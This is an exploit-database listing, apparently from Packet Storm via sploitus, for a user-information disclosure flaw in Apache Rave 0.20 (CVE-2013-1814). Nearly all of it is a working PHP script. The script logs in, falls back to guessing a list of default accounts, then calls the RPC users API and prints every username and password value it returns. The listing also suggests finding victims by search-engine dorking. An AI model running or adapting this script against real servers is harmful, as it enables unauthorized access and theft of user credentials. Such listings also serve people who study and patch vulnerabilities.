Share
## https://sploitus.com/exploit?id=PACKETSTORM:189627
=============================================================================================================================================
| # Title : Apache Rave 0.20 Disclosure of user information vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits) |
| # Vendor : https://archive.apache.org/dist/rave/binaries/apache-rave-0.20-bin.tar.gz.sha |
=============================================================================================================================================
POC :
[+] Dorking ฤฐn Google Or Other Search Enggine.
[+] Code Description: Extract user data from Apache Rave by exploiting a vulnerability in the RPC API.
(Related : https://packetstorm.news/files/id/180605/ Linked CVE numbers: CVE-2013-1814 ) .
[+] save code as poc.php.
[+] Set target : line 90
[+] PayLoad :
<?php
class ApacheRaveExploit {
private $target;
private $port;
private $username;
private $password;
private $default_accounts = [
"canonical" => "canonical",
"john.doe" => "john.doe",
"jane.doe" => "jane.doe",
"johnldap" => "johnldap",
"four.col" => "four.col"
];
public function __construct($target, $port = 8080, $username = "", $password = "") {
$this->target = $target;
$this->port = $port;
$this->username = $username;
$this->password = $password;
}
private function sendRequest($url, $method = "GET", $data = [], $cookie = "") {
$ch = curl_init();
curl_setopt($ch, CURLOPT_URL, $url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_CUSTOMREQUEST, $method);
if ($method === "POST") {
curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
}
if ($cookie) {
curl_setopt($ch, CURLOPT_COOKIE, "JSESSIONID=$cookie");
}
$response = curl_exec($ch);
curl_close($ch);
return $response;
}
public function login($username, $password) {
$url = "http://{$this->target}:{$this->port}/portal/j_spring_security_check";
$response = $this->sendRequest($url, "POST", [
"j_username" => $username,
"j_password" => $password
]);
preg_match('/JSESSIONID=([^;]+)/', $response, $matches);
return $matches[1] ?? null;
}
public function discloseUsers($cookie) {
$url = "http://{$this->target}:{$this->port}/portal/app/api/rpc/users/get?offset=0";
$response = $this->sendRequest($url, "GET", [], $cookie);
return json_decode($response, true);
}
public function run() {
echo "[*] Trying to authenticate...\n";
$cookie = $this->login($this->username, $this->password);
if (!$cookie) {
echo "[-] Failed with provided credentials, trying default accounts...\n";
foreach ($this->default_accounts as $user => $pass) {
echo "[*] Trying $user...\n";
$cookie = $this->login($user, $pass);
if ($cookie) {
echo "[+] Logged in with $user!\n";
break;
}
}
}
if (!$cookie) {
echo "[-] Login failed!\n";
return;
}
echo "[*] Fetching user data...\n";
$users = $this->discloseUsers($cookie);
if ($users && isset($users["result"]["resultSet"])) {
foreach ($users["result"]["resultSet"] as $user) {
echo "[+] Found user: " . $user["username"] . " - " . $user["password"] . "\n";
}
} else {
echo "[-] No users found!\n";
}
}
}
$exploit = new ApacheRaveExploit("target-ip", 8080, "admin", "password");
$exploit->run();
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================